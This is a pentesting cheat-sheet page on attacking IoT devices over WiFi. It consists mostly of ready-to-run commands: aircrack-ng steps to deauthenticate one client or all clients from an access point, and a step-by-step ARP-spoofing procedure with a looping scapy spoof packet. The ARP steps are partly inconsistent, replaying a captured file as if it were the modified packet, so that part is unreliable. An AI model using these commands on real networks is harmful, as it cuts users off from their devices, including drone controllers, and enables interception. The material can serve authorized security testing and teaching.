Deauthentication Attacks

Theory

IoT devices are often either connected to a WiFi network or even host their own network for user to intact with it. A stable WiFi connection can be critical to some IoT devices.For example deauthentication is probably one of the most concerning things a drone pilot can experience, since when his controller is deauthenticated he is unable to control the drone appropriate.

Cheat Sheet

Using aireplay-ng

# Put the wireless interface in monitor mode
airmon-ng start wlan0  

# Scan for networks to identify target AP and clients
airodump-ng wlan0mon  

# (Optional) Focus scan on a specific channel to reduce noise
airodump-ng -c <channel> wlan0mon  

# Perform deauthentication attack on a specific client
aireplay-ng --deauth 10 -a <AP_BSSID> -c <CLIENT_MAC> wlan0mon  

# Deauthenticate all clients from the AP
aireplay-ng --deauth 10 -a <AP_BSSID> wlan0mon  

# Stop monitor mode on the wireless interface
airmon-ng stop wlan0mon  

ARP-Spoofing:

# 1. Join the Target Network
# Connect to the target network (no command, but ensure you're connected to the same network as the target device).

# 2. Identify the Target Device and Controller
nmap -sn <network_address_range>  # Scans the network to identify devices (replace with network range, e.g., 192.168.1.0/24)

# 3. Capture a Legitimate ARP Response
tcpdump -i <interface> arp -w arp_capture.pcap  # Captures ARP packets to a file (replace <interface> with your network interface)

# 4. Modify the ARP Response with a Spoofed MAC Address
# Use a tool like `scapy` in Python to craft a spoofed ARP packet:
from scapy.all import ARP, send
packet = ARP(op=2, psrc="<controller_IP>", hwsrc="<attacker_MAC>", pdst="<target_IP>")
send(packet, loop=1, inter=0.5)

# 5. Replay the Spoofed ARP Packet to the Target Device
tcpreplay --intf1=<interface> -l 0 arp_capture.pcap  # Sends the modified ARP packet to the network continuously (replace <interface>)

# 6. Monitor the Connection Status
# Observe the target device or controller for any indication of disconnection (e.g., disconnected light or notification).

# 7. Stop the Attack
# Stop sending packets by terminating the `tcpreplay` or ARP spoofing script (press Ctrl+C to end the process).

Usage

1. Put the Wireless Interface in Monitor Mode

First, place your wireless network interface card in monitor mode. Replace wlan0 (should be shown in ifconfig) with your interface name.

airmon-ng start wlan0

This will enable monitor mode on wlan0 and may rename it to something like wlan0mon.

2. Identify Target Access Point and Clients

Next, use airodump-ng to find the BSSID (MAC address) of the access point (AP) and the client(s) connected to it.

airodump-ng wlan0mon

Take note of the BSSID of the target AP and the channel it is operating on.

3. Deauthenticate Target Client

Use the aireplay-ng command to send deauthentication packets. Replace wlan0mon with your monitor interface, AP_BSSID with the BSSID of the access point, and CLIENT_MAC with the MAC address of the target client.

  • Deauthenticate a specific client from an AP:

    aireplay-ng --deauth 10 -a AP_BSSID -c CLIENT_MAC wlan0mon

    Here, 10 is the number of deauth packets to send (you can increase or decrease this as needed).

  • Deauthenticate all clients from an AP:

    aireplay-ng --deauth 10 -a AP_BSSID wlan0mon

Resources

https://book.hacktricks.xyz/generic-methodologies-and-resources/pentesting-wifi#deauthentication-packets https://en.wikipedia.org/wiki/Wi-Fi_deauthentication_attack

Last updated